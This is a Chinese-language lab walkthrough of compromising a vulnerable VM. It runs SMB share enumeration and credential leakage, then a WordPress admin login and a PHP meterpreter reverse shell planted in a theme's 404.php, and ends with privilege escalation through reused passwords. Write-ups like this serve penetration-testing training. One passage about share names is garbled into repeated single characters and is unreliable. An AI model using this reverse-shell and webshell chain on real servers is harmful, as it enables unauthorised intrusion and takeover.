确认ip,挖掘信息
仍然是首先查看ip,通过sudo -i 获取root,然后用netdiscover找到靶机的地址。
靶机的ip是192.168.43.120
因为虚拟机的网络设置选的是桥接模式,所以后面显示的是vmware, Inc。
挖掘开放信息服务:nmap -sV 192.168.43.17
针对smb协议弱点探测
因为这节主要针对的是smb协议,所以对其进行一波探测
首先,使用空口令:smbclient -L IP,列出该ip所分享的文件和链接。
Print
是
共
享
驱
动
,
就
是
共
享
打
印
机
S
h
a
r
e
是共享驱动,就是共享打印机 Share
是共享驱动,就是共享打印机Share是共享文件夹
IPC$是共享空连接,不需要用户名就能登陆的web服务器
smbclient ‘\IP\print$’ 查看print里面的东西(没有权限)
smbclient’\IP\share$'同理
get+文件名,可以下载获得文件信息
打开新的终端,打开文件:
发现写着密码为12345
相同的方法下载todolist.txt下来看看
接下来打开wordpress看看,主要看配置文件
可以从前面看到该服务器开放了mysql 3306端口,尝试直接连接数据库
失败
因为开放了22端口,尝试使用ssh协议远程登录。
(下面因为更换了网络,导致ip地址出现了变化
从192.168.43.120变成了192.168.3.13。)
针对smb协议,查看是否存在远程溢出漏洞进行分析。
searchsploit samba版本号
没有任何漏洞可以利用
针对http协议弱点探测
使用dirb命令进行扫描
发现wrodpress的wp-admin
打开网页看看
输入前面的wp-config.php中的账号和密码。
成功进入
构造payload获取shell
使用msfvenom构造payload
不用输入lhost 和lport,已经自己构造好了。
新建一个shell.php文件,将payload输入(此处的ip是攻击机的ip):
使用payload:
打开msfconsole
输入use exploit/multi/handler命令
设置payload
set payload php/meterpreter/reverse_tcp
通过show options查看设置
设置lhost,通过show options查看:
run启动监听
在wordpress中上传webshell
获取反弹shell:wordpress 上传点 theme 404.php
执行:http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php
将webshell.php粘贴到 wordpress中的Appearance中,Editor中的404页面
点击update file
接下来访问404页面
执行:http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php
注意这里的twentyfifiteen要按照图中自己的实际情况修改,打开网址
查看监听端:
发现确实返回了一个shell,而且是从靶场ip返回的
输入shell,输入id,查看当前用户
到这里便拿到了服务器的普通权限。
优化终端
python -c “import pty;pty.spawn(’/bin/bash’)”
回到了熟悉的界面。
获得flag
使用cat /etc/passwd命令
来查看每个用户账号的属性。
可以看到里面有一个熟悉的,在wordpress页面中出现了很多次的用户togie,切换到其账户:
su togie
密码是之前deets.txt中写的12345
成功进入
同理,使用sudo -i命令进入root模式,密码同样是12345
进入root目录,可以看到proof.txt文件。